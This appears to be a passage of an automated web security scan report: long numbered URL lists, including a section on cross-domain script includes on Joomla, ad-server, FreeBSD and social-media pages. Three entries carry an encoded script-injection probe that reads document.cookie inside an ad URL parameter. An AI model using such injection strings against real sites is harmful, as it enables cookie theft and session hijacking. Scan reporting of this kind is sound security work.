20.501. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/921111570/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.502. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/923231364/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.503. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/923268972/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.504. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/92510348/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

20.505. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/9254732/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.506. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/927498208/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.507. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/932017176/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c

20.508. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/94065203/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.509. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/961952614/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.510. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/976058214/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.511. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/976571722/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.512. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/987149795/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

20.513. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/991358723/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.514. http://oasc17c.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/search_results.php/1586088685@Right1,Right2,Right3,Top

20.515. http://opensourcematters.org/index.php

20.516. http://people.joomla.org/groups/viewdiscussion/996-Joomla®%2016%20Has%20Arrived.html

20.517. http://picasaweb.google.com/lh/view

20.518. http://r1-ads.ace.advertising.com/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

20.519. http://r1-ads.ace.advertising.com/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

20.520. http://r1-ads.ace.advertising.com/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

20.521. http://rcm.amazon.com/e/cm

20.522. http://rcm.amazon.com/e/cm

20.523. http://rcm.amazon.com/e/cm

20.524. http://rd.apmebf.com/w/pg

20.525. http://scholar.google.com/schhp

20.526. http://scholar.google.com/scholar

20.527. http://slashdot.org/bookmark.pl

20.528. http://sourceforge.net/softwaremap/

20.529. http://tag.admeld.com/pixel

20.530. http://tags.bluekai.com/site/10

20.531. http://tags.bluekai.com/site/10

20.532. http://translate.google.com/

20.533. http://translate.google.com/translate_t

20.534. http://tweetmeme.com/eyewonder/interim.html

20.535. http://tweetmeme.com/search

20.536. http://tweetmeme.com/story.php

20.537. http://twitter.com/

20.538. http://twitter.com/share

20.539. http://video.google.com/

20.540. http://www.abbreviations.com/bs2.aspx

20.541. http://www.abbreviations.com/searchAmazon.aspx

20.542. http://www.addthis.com/bookmark.php

20.543. http://www.addthis.com/feed.php

20.544. http://www.amazon.com/

20.545. http://www.amazon.com/b/

20.546. http://www.amazon.com/books-used-books-textbooks/b

20.547. http://www.amazon.com/dp/0313363153

20.548. http://www.amazon.com/dp/0814410960

20.549. http://www.amazon.com/dp/B000EFAO1G

20.550. http://www.amazon.com/dp/B001AIM6V2

20.551. http://www.amazon.com/dp/B0037UT1LY

20.552. http://www.amazon.com/dvds-used-hd-action-comedy-oscar/b

20.553. http://www.amazon.com/gp/product/0596804946

20.554. http://www.amazon.com/music-rock-classical-pop-jazz/b

20.555. http://www.amazon.com/toys/b

20.556. http://www.autobytel.com/content/buy/index.cfm

20.557. http://www.autobytel.com/content/home/help/index.cfm

20.558. http://www.autobytel.com/content/home/index.cfm

20.559. http://www.autocheck.com/

20.560. http://www.autotrader.com/

20.561. http://www.autotrader.com/

20.562. http://www.autotrader.com/hornav/trader/index.jsp

20.563. http://www.autotraderstatic.com/inc/global.js

20.564. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx

20.565. http://www.carmax.com/

20.566. http://www.dynamicdrive.com/forums/showthread.php

20.567. http://www.espatial.com/contact/live-trial-adwords

20.568. http://www.eyewonderlabs.com/ct.cfm

20.569. http://www.facebook.com/apps/application.php

20.570. http://www.facebook.com/connect/connect.php

20.571. http://www.facebook.com/connect/connect.php

20.572. http://www.facebook.com/connect/connect.php

20.573. http://www.facebook.com/plugins/like.php

20.574. http://www.facebook.com/plugins/like.php

20.575. http://www.facebook.com/plugins/likebox.php

20.576. http://www.facebook.com/plugins/likebox.php

20.577. http://www.facebook.com/profile.php

20.578. http://www.facebook.com/sharer.php

20.579. http://www.fiction.net/blong/programs/#aub/x26amp

20.580. http://www.filewatcher.com/_/

20.581. http://www.flickr.com/badge_code_v2.gne

20.582. http://www.flickr.com/badge_code_v2.gne

20.583. http://www.freebsd.org/cgi/pds.cgi

20.584. http://www.freebsd.org/cgi/url.cgi

20.585. http://www.freebsd.org/cgi/url.cgi

20.586. http://www.freebsd.org/cgi/url.cgi

20.587. http://www.freebsd.org/cgi/url.cgi

20.588. http://www.freebsd.org/cgi/url.cgi

20.589. http://www.freebsd.org/cgi/url.cgi

20.590. http://www.freebsd.org/cgi/url.cgi

20.591. http://www.freebsd.org/cgi/url.cgi

20.592. http://www.freebsd.org/cgi/url.cgi

20.593. http://www.freebsd.org/cgi/url.cgi

20.594. http://www.freebsd.org/cgi/url.cgi

20.595. http://www.freebsd.org/cgi/url.cgi

20.596. http://www.freebsd.org/cgi/url.cgi

20.597. http://www.freebsd.org/cgi/url.cgi

20.598. http://www.freebsd.org/cgi/url.cgi

20.599. http://www.freebsd.org/cgi/url.cgi

20.600. http://www.freebsd.org/cgi/url.cgi

20.601. http://www.freebsd.org/cgi/url.cgi

20.602. http://www.freebsd.org/cgi/url.cgi

20.603. http://www.freebsd.org/cgi/url.cgi

20.604. http://www.freebsd.org/cgi/url.cgi

20.605. http://www.freebsd.org/cgi/url.cgi

20.606. http://www.freebsd.org/cgi/url.cgi

20.607. http://www.freebsd.org/cgi/url.cgi

20.608. http://www.freebsd.org/cgi/url.cgi

20.609. http://www.freebsd.org/cgi/url.cgi

20.610. http://www.freebsd.org/cgi/url.cgi

20.611. http://www.freebsd.org/cgi/url.cgi

20.612. http://www.freebsd.org/cgi/url.cgi

20.613. http://www.freebsd.org/cgi/url.cgi

20.614. http://www.freebsd.org/cgi/url.cgi

20.615. http://www.freebsd.org/cgi/url.cgi

20.616. http://www.freebsd.org/cgi/url.cgi

20.617. http://www.freebsd.org/cgi/url.cgi

20.618. http://www.freebsd.org/cgi/url.cgi

20.619. http://www.freebsd.org/cgi/url.cgi

20.620. http://www.freebsd.org/cgi/url.cgi

20.621. http://www.freebsd.org/cgi/url.cgi

20.622. http://www.freebsd.org/cgi/url.cgi

20.623. http://www.freebsd.org/cgi/url.cgi

20.624. http://www.freebsd.org/cgi/url.cgi

20.625. http://www.freebsd.org/cgi/url.cgi

20.626. http://www.freebsd.org/cgi/url.cgi

20.627. http://www.freebsd.org/cgi/url.cgi

20.628. http://www.freebsd.org/cgi/url.cgi

20.629. http://www.freebsd.org/cgi/url.cgi

20.630. http://www.freebsd.org/cgi/url.cgi

20.631. http://www.freebsd.org/cgi/url.cgi

20.632. http://www.freebsd.org/cgi/url.cgi

20.633. http://www.freebsd.org/cgi/url.cgi

20.634. http://www.freebsd.org/cgi/url.cgi

20.635. http://www.freebsd.org/cgi/url.cgi

20.636. http://www.freebsd.org/cgi/url.cgi

20.637. http://www.freebsd.org/cgi/url.cgi

20.638. http://www.freebsd.org/cgi/url.cgi

20.639. http://www.freebsd.org/cgi/url.cgi

20.640. http://www.freebsd.org/cgi/url.cgi

20.641. http://www.freebsd.org/cgi/url.cgi

20.642. http://www.freebsd.org/cgi/url.cgi

20.643. http://www.freebsd.org/cgi/url.cgi

20.644. http://www.freebsd.org/cgi/url.cgi

20.645. http://www.freebsd.org/cgi/url.cgi

20.646. http://www.freebsd.org/cgi/url.cgi

20.647. http://www.freebsd.org/cgi/url.cgi

20.648. http://www.freebsd.org/cgi/url.cgi

20.649. http://www.freebsd.org/cgi/url.cgi

20.650. http://www.freebsd.org/cgi/url.cgi

20.651. http://www.freebsd.org/cgi/url.cgi

20.652. http://www.freebsd.org/cgi/url.cgi

20.653. http://www.freebsd.org/cgi/url.cgi

20.654. http://www.freebsd.org/cgi/url.cgi

20.655. http://www.freebsd.org/cgi/url.cgi

20.656. http://www.freebsd.org/cgi/url.cgi

20.657. http://www.freebsd.org/cgi/url.cgi

20.658. http://www.freebsd.org/cgi/url.cgi

20.659. http://www.freebsd.org/cgi/url.cgi

20.660. http://www.freebsd.org/cgi/url.cgi

20.661. http://www.freebsd.org/cgi/url.cgi

20.662. http://www.freebsd.org/cgi/url.cgi

20.663. http://www.freebsd.org/cgi/url.cgi

20.664. http://www.freebsd.org/cgi/url.cgi

20.665. http://www.google.com/finance

20.666. http://www.google.com/finance

20.667. http://www.google.com/imghp

20.668. http://www.google.com/language_tools

20.669. http://www.google.com/prdhp

20.670. http://www.google.com/preferences

20.671. http://www.google.com/realtime

20.672. http://www.google.com/search

20.673. http://www.google.com/search

20.674. http://www.google.com/search

20.675. http://www.google.com/search

20.676. http://www.google.com/search

20.677. http://www.google.com/support/chrome/bin/answer.py

20.678. http://www.google.com/support/websearch/bin/answer.py

20.679. http://www.google.com/url

20.680. http://www.google.com/url

20.681. http://www.google.com/url

20.682. http://www.google.com/url

20.683. http://www.google.com/url

20.684. http://www.google.com/webhp

20.685. http://www.groupon.com/washington-dc/subscribe

20.686. http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x26amp

20.687. http://www.hugg.com/submit

20.688. http://www.jeroenwijering.com/

20.689. http://www.linkagogo.com/go/AddNoPopup

20.690. http://www.lithuanianjoomla.com/component/users/

20.691. http://www.liutilities.com/affcb/

20.692. http://www.livejournal.com/update.bml

20.693. http://www.lynda.com/landing/softwaretraining.aspx

20.694. http://www.mensfitness.com/Tshirt_Workout/fitness/ab_exercises/136

20.695. http://www.mindbodygreen.com/passvote.action

20.696. http://www.mister-wong.com/index.php

20.697. http://www.netscape.com/submit/

20.698. http://www.newsvine.com/_wine/save

20.699. http://www.nexternal.com/ecommerce/joomla-shopping-cart.asp

20.700. http://www.officedepot.com/promo.do

20.701. https://www.paperg.com/post.php

20.702. http://www.simpy.com/simpy/LinkAdd.do

20.703. http://www.soundingsonline.com/archives

20.704. http://www.soundingsonline.com/component/chronocontact/

20.705. http://www.soundingsonline.com/index.php

20.706. http://www.soundingsonline.com/index.php

20.707. http://www.standingcloud.com/growbusiness.php

20.708. http://www.stumbleupon.com/submit

20.709. http://www.svenskjoomla.se/index.php

20.710. http://www.t-mobile.com/Company/Community.aspx

20.711. http://www.thisnext.com/pick/new/submit/sociable/

20.712. http://www.x64bitdownload.com/contact.html

20.713. http://www.x64bitdownload.com/software-advanced.html

20.714. http://www.youtube.com/

20.715. http://www.youtube.com/subscribe_widget

20.716. http://www1.whdh.com/includes/elements/accordion_whdh

20.717. http://www1.whdh.com/includes/elements/sidecol_video_box.php

20.718. http://www1.whdh.com/includes/elements/sidecol_video_box.php

20.719. http://www1.whdh.com/video/player/

21. Cross-domain script include

21.1. http://ad.turn.com/server/ads.js

21.2. http://ad.turn.com/server/ads.js

21.3. http://ads.tweetmeme.com/serve.js

21.4. http://ads.tweetmeme.com/serve.js

21.5. http://ads.tweetmeme.com/serve.js

21.6. http://adserver.teracent.net/tase/ad

21.7. http://autotrader.dealix.com/step1.asp

21.8. http://blog.tweetmeme.com/

21.9. http://blog.tweetmeme.com/wp-content/themes/tweetmeme-0.2/prototype.js

21.10. http://blog.tweetmeme.com/wp-content/themes/tweetmeme-0.2/scriptaculous.js

21.11. http://brandonaaron.net/

21.12. http://cdn.cloudscan.us/examples/html/sql-injection-xss-cross-site-scripting-dork.html

21.13. http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html

21.14. http://cherne.net/brian/resources/jquery.hoverIntent.html

21.15. http://code.google.com/p/swfobject/

21.16. http://community.joomla.org/

21.17. http://community.joomla.org/blogs/community.html

21.18. http://community.joomla.org/blogs/community/1390-jdaychile.html

21.19. http://community.joomla.org/blogs/community/1392-joomla-day-chile-to-be-broadcast-live.html

21.20. http://community.joomla.org/blogs/community/1398-joomladay-chile-2011-recap.html

21.21. http://community.joomla.org/blogs/leadership/1389-joomla-16-arrives-thanks-for-a-job-well-done.html

21.22. http://community.joomla.org/blogs/leadership/1391-joomla-16-presented-at-codemash.html

21.23. http://community.joomla.org/blogs/leadership/1395-the-path-forward-migration-and-the-future.html

21.24. http://community.joomla.org/connect.html

21.25. http://community.joomla.org/connect/social.html

21.26. http://community.joomla.org/events.html

21.27. http://community.joomla.org/events/34-event-news/1393-joomla-16-release-party-in-pune-india.html

21.28. http://community.joomla.org/events/joomla-days/1343-joomla-day-chile-2011.html

21.29. http://community.joomla.org/events/joomla-days/1394-joomladay-the-netherlands-2011.html

21.30. http://community.joomla.org/events/joomla-days/975-joomladay-charter.html

21.31. http://community.joomla.org/featured-articles.html

21.32. http://community.joomla.org/featured-articles/1070-vulnerability-list-update.html

21.33. http://community.joomla.org/featured-articles/1201-priority-vs-speed-decent-docs-and-cut-and-paste.html

21.34. http://community.joomla.org/featured-articles/did-you-know.html

21.35. http://community.joomla.org/gsoc2009.html

21.36. http://community.joomla.org/index.php

21.37. http://community.joomla.org/login.html

21.38. http://community.joomla.org/showcase/

21.39. http://community.joomla.org/showcase/how-to-submit-a-site.html

21.40. http://community.joomla.org/showcase/sites-of-the-month.html

21.41. http://community.joomla.org/showcase/sites/advsearch.html

21.42. http://community.joomla.org/showcase/sites/new.html

21.43. http://community.joomla.org/translations.html

21.44. http://community.joomla.org/translations/translation-policy.html

21.45. http://community.joomla.org/user-groups.html

21.46. http://comunidadjoomla.org/component/content/article/109-general-joomla-16x/202-joomla-16-ya-ha-llegado.html

21.47. http://creativecommons.org/licenses/by/3.0/

21.48. http://d1.openx.org/afr.php

21.49. http://demo.joomla.org/

21.50. http://demo.joomla.org/index.php

21.51. http://dir.filewatcher.com/d/FreeBSD.0.0.htm

21.52. http://dir.filewatcher.com/d/FreeBSD/6-stable.0.0.htm

21.53. http://dir.filewatcher.com/d/FreeBSD/6-stable/amd64/aub-2.2.tbz.41898.html

21.54. http://dir.filewatcher.com/d/FreeBSD/6-stable/ia64/aub-2.2.tbz.41897.html

21.55. http://dir.filewatcher.com/d/FreeBSD/6-stable/sparc64/aub-2.2.tbz.41911.html

21.56. http://dir.filewatcher.com/d/FreeBSD/6.2-release.0.0.htm

21.57. http://dir.filewatcher.com/d/FreeBSD/6.2-release/sparc64/aub-2.2.tbz.41730.html

21.58. http://dir.filewatcher.com/d/FreeBSD/6.3-release.0.0.htm

21.59. http://dir.filewatcher.com/d/FreeBSD/6.3-release/amd64/aub-2.2.tbz.41893.html

21.60. http://dir.filewatcher.com/d/FreeBSD/6.3-release/i386/aub-2.2.tbz.41785.html

21.61. http://dir.filewatcher.com/d/FreeBSD/7-current.0.0.htm

21.62. http://dir.filewatcher.com/d/FreeBSD/7-current/amd64.0.0.htm

21.63. http://dir.filewatcher.com/d/FreeBSD/7-current/amd64/aub-2.2.tbz.41904.html

21.64. http://dir.filewatcher.com/d/FreeBSD/7-current/ia64/aub-2.2.tbz.41797.html

21.65. http://dir.filewatcher.com/d/FreeBSD/7.0-release.0.0.htm

21.66. http://dir.filewatcher.com/d/FreeBSD/7.0-release/amd64/aub-2.2.tbz.41906.html

21.67. http://dir.filewatcher.com/d/FreeBSD/7.0-release/i386/aub-2.2.tbz.41895.html

21.68. http://dir.filewatcher.com/d/FreeBSD/7.0-release/sparc64/aub-2.2.tbz.41941.html

21.69. http://dir.filewatcher.com/d/FreeBSD/8-current.0.0.htm

21.70. http://dir.filewatcher.com/d/FreeBSD/8-current/amd64.0.0.htm

21.71. http://dir.filewatcher.com/d/FreeBSD/8-current/amd64/aub-2.2.tbz.41917.html

21.72. http://dir.filewatcher.com/d/FreeBSD/distfiles.0.0.htm

21.73. http://dir.filewatcher.com/d/FreeBSD/distfiles/Other/aub-2.1.3.tar.gz.55334.html

21.74. http://dir.filewatcher.com/d/OpenBSD.0.0.htm

21.75. http://dir.filewatcher.com/d/OpenBSD/3.3/alpha/aub-2.0.5.tgz.32295.html/x22

21.76. http://dir.filewatcher.com/d/OpenBSD/3.4.0.0.htm

21.77. http://dir.filewatcher.com/d/OpenBSD/3.4/i386.0.0.htm

21.78. http://dir.filewatcher.com/d/OpenBSD/3.4/i386/aub-2.0.5.tgz.32469.html

21.79. http://dir.filewatcher.com/d/OpenBSD/3.4/sparc.0.0.htm

21.80. http://dir.filewatcher.com/d/OpenBSD/3.4/sparc/aub-2.0.5.tgz.32468.html

21.81. http://dir.filewatcher.com/d/OpenBSD/3.4/sparc64.0.0.htm

21.82. http://dir.filewatcher.com/d/OpenBSD/3.4/sparc64/aub-2.0.5.tgz.32472.html

21.83. http://dir.filewatcher.com/d/OpenBSD/3.7.0.0.htm

21.84. http://dir.filewatcher.com/d/OpenBSD/3.7/powerpc.0.0.htm

21.85. http://dir.filewatcher.com/d/OpenBSD/3.7/powerpc/aub-2.0.5.tgz.32553.html

21.86. http://dir.filewatcher.com/d/OpenBSD/3.9.0.0.htm

21.87. http://dir.filewatcher.com/d/OpenBSD/3.9/sparc.0.0.htm

21.88. http://dir.filewatcher.com/d/OpenBSD/3.9/sparc/aub-2.0.5.tgz.32478.html

21.89. http://dir.filewatcher.com/d/OpenBSD/4.0.0.0.htm

21.90. http://dir.filewatcher.com/d/OpenBSD/4.0/alpha.0.0.htm

21.91. http://dir.filewatcher.com/d/OpenBSD/4.0/alpha/aub-2.0.5.tgz.32474.html

21.92. http://dir.filewatcher.com/d/OpenBSD/4.0/amd64.0.0.htm

21.93. http://dir.filewatcher.com/d/OpenBSD/4.0/amd64/aub-2.0.5.tgz.32470.html

21.94. http://dir.filewatcher.com/d/OpenBSD/4.0/m68k.0.0.htm

21.95. http://dir.filewatcher.com/d/OpenBSD/4.0/m68k/aub-2.0.5.tgz.32479.html

21.96. http://dir.filewatcher.com/d/OpenBSD/4.0/sparc.0.0.htm

21.97. http://dir.filewatcher.com/d/OpenBSD/4.0/sparc/aub-2.0.5.tgz.32477.html

21.98. http://dir.filewatcher.com/d/OpenBSD/4.1.0.0.htm

21.99. http://dir.filewatcher.com/d/OpenBSD/4.1/alpha.0.0.htm

21.100. http://dir.filewatcher.com/d/OpenBSD/4.1/alpha/aub-2.0.5.tgz.32475.html

21.101. http://dir.filewatcher.com/d/OpenBSD/4.1/i386.0.0.htm

21.102. http://dir.filewatcher.com/d/OpenBSD/4.1/i386/aub-2.0.5.tgz.32473.html

21.103. http://dir.filewatcher.com/d/OpenBSD/4.1/mips64.0.0.htm

21.104. http://dir.filewatcher.com/d/OpenBSD/4.1/mips64/aub-2.0.5.tgz.32471.html

21.105. http://dir.filewatcher.com/d/OpenBSD/4.1/sparc.0.0.htm

21.106. http://dir.filewatcher.com/d/OpenBSD/4.1/sparc/aub-2.0.5.tgz.32480.html

21.107. http://dir.filewatcher.com/d/OpenBSD/4.1/sparc64.0.0.htm

21.108. http://dir.filewatcher.com/d/OpenBSD/4.1/sparc64/aub-2.0.5.tgz.32476.html

21.109. http://dir.filewatcher.com/d/OpenBSD/4.2.0.0.htm

21.110. http://dir.filewatcher.com/d/OpenBSD/4.2/alpha.0.0.htm

21.111. http://dir.filewatcher.com/d/OpenBSD/4.2/alpha/aub-2.0.5.tgz.32467.html

21.112. http://dir.filewatcher.com/d/OpenBSD/4.2/amd64.0.0.htm

21.113. http://dir.filewatcher.com/d/OpenBSD/4.2/amd64/aub-2.0.5.tgz.32461.html

21.114. http://dir.filewatcher.com/d/OpenBSD/4.2/i386.0.0.htm

21.115. http://dir.filewatcher.com/d/OpenBSD/4.2/i386/aub-2.0.5.tgz.32462.html

21.116. http://dir.filewatcher.com/d/OpenBSD/4.2/powerpc.0.0.htm

21.117. http://dir.filewatcher.com/d/OpenBSD/4.2/powerpc/aub-2.0.5.tgz.32466.html

21.118. http://dir.filewatcher.com/d/OpenBSD/4.3.0.0.htm

21.119. http://dir.filewatcher.com/d/OpenBSD/4.3/i386.0.0.htm

21.120. http://dir.filewatcher.com/d/OpenBSD/4.3/i386/aub-2.0.5.tgz.32459.html

21.121. http://dir.filewatcher.com/d/OpenBSD/snapshots.0.0.htm

21.122. http://dir.filewatcher.com/d/OpenBSD/snapshots/alpha.0.0.htm

21.123. http://dir.filewatcher.com/d/OpenBSD/snapshots/alpha/aub-2.0.5.tgz.32465.html

21.124. http://dir.filewatcher.com/d/Other.0.0.htm

21.125. http://dir.filewatcher.com/d/Other/noarch.0.0.htm

21.126. http://dir.filewatcher.com/d/Other/noarch/Applications.0.0.htm

21.127. http://dir.filewatcher.com/d/Other/noarch/Applications/Communications.0.0.htm

21.128. http://dir.filewatcher.com/d/Other/noarch/Applications/Communications/aub-2.0.5-10.noarch.rpm.73595.html

21.129. http://dir.filewatcher.com/d/Other/src.0.0.htm

21.130. http://dir.filewatcher.com/packages-directory.html

21.131. http://disqus.com/

21.132. http://disqus.com/AnonymousUser/

21.133. http://disqus.com/dashboard/x22/x3Eview

21.134. http://disqus.com/embed/profile/unmerged_profiles/

21.135. http://disqus.com/forums/7newsboston/facebook.html

21.136. http://disqus.com/forums/integrations/twitter/tweetbox.html

21.137. http://disqus.com/forums/integrations/twitter/tweetbox.html

21.138. http://disqus.com/profile/login/

21.139. http://disqus.com/saml/cnn/try/

21.140. http://docs.joomla.org/

21.141. http://docs.joomla.org/Administrators

21.142. http://docs.joomla.org/Beginners

21.143. http://docs.joomla.org/Category:Cookie_jar

21.144. http://docs.joomla.org/Category:Development

21.145. http://docs.joomla.org/Category:FAQ

21.146. http://docs.joomla.org/Category:Tips_and_tricks

21.147. http://docs.joomla.org/Cookie_jar

21.148. http://docs.joomla.org/Developer_Email_lists

21.149. http://docs.joomla.org/Developers

21.150. http://docs.joomla.org/Development_Working_Group

21.151. http://docs.joomla.org/Documentation_Working_Group

21.152. http://docs.joomla.org/Evaluators

21.153. http://docs.joomla.org/GHOP_students/James_William_Ramsay

21.154. http://docs.joomla.org/GHOP_students/Kevin_Hayne

21.155. http://docs.joomla.org/GHOP_students/Michael_Casha

21.156. http://docs.joomla.org/Help_screens

21.157. http://docs.joomla.org/Joomla!_Extension_Directory_FAQs

21.158. http://docs.joomla.org/Joomla_Administrators_Security_Checklist

21.159. http://docs.joomla.org/Migrating_from_1.0.x_to_1.5_Stable

21.160. http://docs.joomla.org/Portal:Bug_Squad

21.161. http://docs.joomla.org/Start_here

21.162. http://docs.joomla.org/Template

21.163. http://docs.joomla.org/Tutorial:Creating_a_basic_Joomla!_template

21.164. http://docs.joomla.org/Upgrading_1.5_from_an_existing_1.5x_version

21.165. http://docs.joomla.org/Web_designers

21.166. http://docs.joomla.org/Working_Groups

21.167. http://docs.joomla.org/index.php

21.168. http://docs.jquery.com/UI

21.169. http://docs.jquery.com/UI/Dialog

21.170. http://docs.jquery.com/UI/Draggables

21.171. http://docs.jquery.com/UI/Droppables

21.172. http://docs.jquery.com/UI/Effects/

21.173. http://docs.jquery.com/UI/Effects/Blind

21.174. http://docs.jquery.com/UI/Effects/Bounce

21.175. http://docs.jquery.com/UI/Effects/Clip

21.176. http://docs.jquery.com/UI/Effects/Drop

21.177. http://docs.jquery.com/UI/Effects/Explode

21.178. http://docs.jquery.com/UI/Effects/Fold

21.179. http://docs.jquery.com/UI/Effects/Highlight

21.180. http://docs.jquery.com/UI/Effects/Pulsate

21.181. http://docs.jquery.com/UI/Effects/Scale

21.182. http://docs.jquery.com/UI/Effects/Shake

21.183. http://docs.jquery.com/UI/Effects/Slide

21.184. http://docs.jquery.com/UI/Effects/Transfer

21.185. http://docs.jquery.com/UI/Resizables

21.186. http://docs.jquery.com/UI/Selectables

21.187. http://docs.jquery.com/UI/Sortables

21.188. http://ebookee.org/TrainSignal-Cisco-CCNA-Training-Videos_929461.html/x22

21.189. http://en.wikipedia.org/wiki/Amazon.com/x22

21.190. http://en.wikipedia.org/wiki/American_University_of_Beirut/x22

21.191. http://en.wikipedia.org/wiki/Auto_Trader/x22

21.192. http://en.wikipedia.org/wiki/Strike_Team

21.193. http://extensions.joomla.org/

21.194. http://extensions.joomla.org/extensions

21.195. http://extensions.joomla.org/extensions/advanced-search

21.196. http://extensions.joomla.org/extensions/languages/translations-for-joomla

21.197. http://extensions.joomla.org/extensions/new

21.198. http://flowplayer.org/tools/

21.199. http://fls.doubleclick.net/activityi

21.200. http://flybase.org/reports/FBgn0000146.html/x22

21.201. http://forum.joomla.org/

21.202. http://forum.joomla.org/ucp.php

21.203. http://forum.joomla.org/viewforum.php

21.204. http://forum.joomla.org/viewtopic.php

21.205. http://gegnia.com/joomla/informacion/mbrriti-joomla-1-pik-6

21.206. http://googleads.g.doubleclick.net/pagead/ads

21.207. http://googleads.g.doubleclick.net/pagead/ads

21.208. http://green.autobytel.com/

21.209. http://groups.google.com/group/alt.slack/msg/fa1fe1e3e6c31c9b/x22

21.210. http://groups.google.com/group/joomla-commits/topics

21.211. http://groups.google.com/group/joomla-dev-framework

21.212. http://groups.google.com/group/joomla-dev-general

21.213. http://groups.google.com/group/joomlabugsquad

21.214. http://groups.google.com/grphp

21.215. http://hairmakeup.tweetmeme.com/

21.216. http://help.tweetmeme.com/

21.217. http://help.tweetmeme.com/2009/04/07/api-documentation/

21.218. http://help.tweetmeme.com/2009/04/09/rss-feeds/

21.219. http://help.tweetmeme.com/2009/04/09/twitter-feeds/

21.220. http://help.tweetmeme.com/contact/

21.221. http://help.tweetmeme.com/language/

21.222. http://home.big.jp/flets/

21.223. http://howto.tweetmeme.com/

21.224. http://investor.autobytel.com/

21.225. http://iphone.tweetmeme.com/

21.226. http://it.toolbox.com/blogs/database-soup

21.227. http://it.toolbox.com/blogs/database-talk

21.228. http://it.toolbox.com/blogs/db2luw

21.229. http://it.toolbox.com/blogs/db2zos

21.230. http://it.toolbox.com/blogs/elsua

21.231. http://it.toolbox.com/blogs/juice-analytics

21.232. http://it.toolbox.com/blogs/minimalit

21.233. http://it.toolbox.com/blogs/penguinista-databasiensis

21.234. http://it.toolbox.com/blogs/ppmtoday

21.235. http://javascript.internet.com/

21.236. http://joomfa.org/joomla-16-persian.html

21.237. http://joomla.jp/news/1-projectnews/169-joomla-16-has-arrived.html

21.238. http://joomla.pl/powiadomienia/577-joomla-16-wydany.html

21.239. http://joomlacode.org/

21.240. http://joomlacode.org/gf/

21.241. http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=Nexternal.com/Joomla-Shopping-Cart&adT=Joomla+Compatible+Cart&adU=www.lynda.com&adT=Joomla+Tutorials&gl=US/x26amp

21.242. http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=www.Tenrox.com/Free_Demo&adT=Online+Project+Management&adU=www.eSpatial.com/Free-Trial&adT=Geographic+Information&gl=US/x26amp

21.243. http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=www.safepeak.com&adT=ImageAd&gl=US/x26amp

21.244. http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=www.sysaid.com&adT=ImageAd&gl=US/x26amp

